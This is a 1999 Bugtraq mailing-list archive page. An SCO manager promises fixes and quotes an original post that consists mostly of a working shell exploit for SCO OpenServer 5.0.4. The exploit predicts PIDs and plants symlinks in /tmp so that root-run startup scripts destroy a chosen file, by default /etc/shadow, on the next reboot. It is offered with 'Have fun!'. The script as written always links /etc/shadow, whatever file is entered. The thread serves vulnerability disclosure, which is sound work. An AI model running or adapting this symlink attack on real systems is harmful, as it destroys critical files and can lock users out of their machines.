Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Little exploit for startup scripts (SCO 5.0.4p).

From: jonco () SCO com (Jon Coyle)
Date: Mon, 8 Mar 1999 11:58:54 -0000

Leshka,

We have started work on this and are checking all of our OS
products to see if they suffer from similar problems. We will
make information available at our  security pages http://www.sco.com/security)
on how to work around the
problem, and will also have fixes available in a few days.

Thanks,

Jon


-----Original Message-----
From: Bugtraq List [mailto:BUGTRAQ () netspace org]On Behalf Of leshka
Sent: 07 March 1999 12:07
To: BUGTRAQ () netspace org
Subject: Little exploit for startup scripts (SCO 5.0.4p).


#!/bin/sh
#
#                                   ... The punishment for inobedience ...
#                                                   (Cycle # 2)
#
#                This simple script can help to erase any file
#                 (SCO OpenServer Enterprise System v 5.0.4p).
#                                 Have fun !
#
#
#
#
# Some of "/etc/rc2.d" startup scripts create and then delete
temporary files
# with  easily  predictable  names in "/tmp" directory.  Below
there is a few
# interesting fragments of those nice scripts:
#
# S84rpcinit:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/rpc$$ 2>/tmp/rpc.err$$
#       /bin/rm -f /tmp/rpc.err$$
# ...
#       rm -rf /tmp/rpc$$
#
# S95nis:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nis$$ 2>/tmp/nis.err$$
#       /bin/rm -f /tmp/nis.err$$
# ...
#       rm -f /tmp/nis$$
#
# S85tcp:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/tps$$ 2>/tmp/ps.err$$
#       /bin/rm -f /tmp/ps.err$$
# ...
#       /bin/rm -f /tmp/tps$$
#
# S89nfs:
# ...
#       /bin/su root -c "/bin/ps -ef" > /tmp/nfs$$ 2>/tmp/nfs.err$$
#       /bin/rm -f /tmp/nfs.err$$
# ...
#       rm -f /tmp/nfs$$
#
# Every time during the startup  such shell scripts creates files with names
# that include a process number of the above shell script. My numerous tests
# showed that the number is always the same with every reboot.  Pretty good,
# isn't it? One problem: how to determine the process number of such script?
# It's  so simple!  Child processes  of this script  have PID's  with values
# slightly over than  the parent's PID.  A little math and one gets it. Next
# step is  creating  a few symbolic links  to the victime file in the "/tmp"
# directory. During the next startup the victim file will be destroyed.
#
# P.S.  Looking forward  to getting published a complete SCO's list of names
# of such perfect shell scripts.
#
#                                   999,99*2
#
#                            ----------------------
#                ---------------------------------------------
#     -----------------   Dedicated to my beautiful lady
------------------
#                ---------------------------------------------
#                            ----------------------
#
#       Leshka Zakharoff, 1999. E-mail: leshka () leshka chuvashia su (.ru)
#
#
#
if [ _$1 = "_" ]
then
    {
     echo -n "File to delete [/etc/shadow]:"
     read victim_file
     if [ _$victim_file = "_" ]
        then
            victim_file="/etc/shadow"
        fi
    }
else
    victim_file=$1
fi
pid=`/bin/ps -ef|/bin/grep -v awk|/usr/bin/awk '/inetd/ { printf  $2 }'`
lastpid=`expr $pid - 30`
while [ $pid != $lastpid ]
      do
        pid=`expr $pid - 1`;ln -fs /etc/shadow /tmp/tps$pid
      done
echo Done ! File \"$victim_file\" will be destroyed after the next reboot.


----
Jon Coyle - Manager, Internet Engineering & Secure Technologies
jonco () sco com                                                         SCO Ltd.
Tel: +44 1923 813656                                  Croxley Business Park
Fax: +44 1923 813804                                              Hatters Lane
http://www.sco.com                                     Watford, WD1 8YN, UK
Fingerprint: F44A 677A 4920 02AC C655  D419 B9B7 46B0 A951 6FF7
Previous By Date Next
Previous By Thread Next

Current thread: